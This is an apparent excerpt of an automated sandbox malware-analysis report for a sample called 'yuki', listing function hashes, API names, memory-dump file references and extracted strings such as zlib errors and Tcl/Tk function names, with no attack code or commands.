                                                                                                      • Opcode Fuzzy Hash: aaa7b9ff11bb4346a21cc87fb8eff4a238e48d36b47c5124ab7cd44ae98a1b97
                                                                                                      • Instruction Fuzzy Hash: 8821A231B186A246FB209F3265183BA9681FF55FC5FC84430EE8D87B86CE7DE041C208
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                      • Instruction ID: 0a02bdf74c2e514b67e83d01fe0c0306c14a3bb976ac7e773df1f16d008bc208
                                                                                                      • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                      • Instruction Fuzzy Hash: 5631E632A1868291F7316F758A6837D2690AF80BA7F814135EADD833D2CF7CE4418799
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3947729631-0
                                                                                                      • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                      • Instruction ID: 9f365a3f2db9c226c1ccf6c02dda071857c6a38b10047b79901384593ce61bde
                                                                                                      • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                      • Instruction Fuzzy Hash: F3219F72A0578989EB248FB8C4982EC33A0FB04719F544636D79E86AD5DF3CE544D784
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                      • Instruction ID: 128ae0a0e032ef02a50672227f6276110f88380cd76a15b7033f04f1be6026cb
                                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                      • Instruction Fuzzy Hash: 34117531A1C6C181EA70AF21972927EA664BF95B85F844431EBCDE7BD6CF3DE4014788
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                      • Instruction ID: 6ccd620cdbaee01cbb88d8c6c35c472ae5d1e75e6665b1db68a6d5451b6d3411
                                                                                                      • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                      • Instruction Fuzzy Hash: BB218032A18A8186DB718F28D58477D76A0FB84B95F244234E69DC76D9DF3DDC018B44
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                      • Instruction ID: bb4ef5550e46f7c3e3b65ae573f0b929ca7b160b7f45025a7455df4634194f70
                                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                      • Instruction Fuzzy Hash: 6101A531A0878580E924DF725A180A9A691BF95FE1F484631DEDCA7BD6CF3CD4014348
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                      • Instruction ID: b1be24c50f0c8335a6a9ad6ac565cd6a7df3134516c5f168c44255703b0a6408
                                                                                                      • Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                      • Instruction Fuzzy Hash: 85018730E1D6C644FAB06E31672C1791990AF02792F644235EADCC27C6DF3EA8418288
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                      • Instruction ID: 573a462ebc706a03b9923e65414b8432ea01cf41027f7ec119b13ca911b071aa
                                                                                                      • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                      • Instruction Fuzzy Hash: 2CE08670E0C6C24BF6313EB40BAD17A14608F95343F804031D988863C3DF2C7C545269
                                                                                                      APIs
                                                                                                      • HeapAlloc.KERNEL32(?,?,00000000,00007FF6C820B32A,?,?,?,00007FF6C8204F11,?,?,?,?,00007FF6C820A48A), ref: 00007FF6C820EBED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 4292702814-0
                                                                                                      • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                      • Instruction ID: 8e227c20aa700e3603c8a86890e8d678e65ad5e098b37f78d504ad865e4a96e7
                                                                                                      • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                      • Instruction Fuzzy Hash: D3F062B8B0928640FE786E755A7D2B902946F88B82F4C4531CD8FC63D2EF1CE8C14299
                                                                                                      APIs
                                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF6C8200C90,?,?,?,00007FF6C82022FA,?,?,?,?,?,00007FF6C8203AE9), ref: 00007FF6C820D63A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 4292702814-0
                                                                                                      • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                      • Instruction ID: 59232f01436e9b99d3dda1f3d00a93884725425213f8c0638aa181a39c8c7a29
                                                                                                      • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                      • Instruction Fuzzy Hash: D9F05E20F0A28641FE742F716A2D27511944F887A3F080730EDAEC62C6DF2DF8808698
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorLastProc
                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                      • API String ID: 199729137-3427451314
                                                                                                      • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                      • Instruction ID: 88d314b2272f3360b4be67c67e22b2b6b9f5e5bb59a4bcbd9b89f604fe806545
                                                                                                      • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                      • Instruction Fuzzy Hash: E102F870909B47D1FA749F74BA581B423B5AF15B53F600435D4AE826A0EF3EF949C288
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                      • API String ID: 808467561-2761157908
                                                                                                      • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                      • Instruction ID: 447ac7e812b81f7c611146ef33cdb4e6112ca306e2ce4f2bbba47dd53db466b2
                                                                                                      • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                      • Instruction Fuzzy Hash: 7EB2E872A182824AE7748E74D6487FE77A2FB5434AF601135DA4E97A84DF3DED00CB84
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                      • API String ID: 0-2665694366
                                                                                                      • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                      • Instruction ID: fa7fead3feb5f077e2d3727b6192596aa95069010ef8199631fbf29146589233
                                                                                                      • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                      • Instruction Fuzzy Hash: 6352F472A146A68BD7A48F24D458B7E3BE9FB54745F014139E68AC7B80DF3CE940CB44
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                      • Instruction ID: 44ba6e17362ae1bfc8f3ccd2fef5d5695d0d05d69096654c7aa116263f07475c
                                                                                                      • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                      • Instruction Fuzzy Hash: 7B313B72618B8196EB709F60E8843EE63B0FB94746F44403ADA8E87B94DF7DD548C714
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                      • Instruction ID: e5422af446732cf6187b86b8c3bdafd81ab422c6a759c6cab886417edc45543c
                                                                                                      • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                      • Instruction Fuzzy Hash: 54317E36618B8196DB70CF34E8542AE33A4FB98759F500136EA8E83B65DF3CC545CB44
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227656907-0
                                                                                                      • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                      • Instruction ID: 941263268c281841e1977125164a9bbf8888557bdb2138b9907290e857ff1c98
                                                                                                      • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                      • Instruction Fuzzy Hash: A0B12822B1868641EA70DF3196181B963A0EF44BE5F646132DDDD87BC5EF3DE841C388
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                      • Instruction ID: af29266ed2c33837f080d2c0a8ba8ce82c65ac56359c378efa57f530f72be48f
                                                                                                      • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                      • Instruction Fuzzy Hash: 44117026B14F058AEB10CF70E9482B933B4FB19769F440E31DAAD86BA4DF7CD5598384
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy_s
                                                                                                      • String ID:
                                                                                                      • API String ID: 1502251526-0
                                                                                                      • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                      • Instruction ID: a72731e8057f35dfeb9189ba98c48f0ca4a2324191f20b643c10d76f36ab8432
                                                                                                      • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                      • Instruction Fuzzy Hash: 69C1C472B1828687D7348F26A14C66AB792F794B85F548134DB8E83784DE3EEC01CB84
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
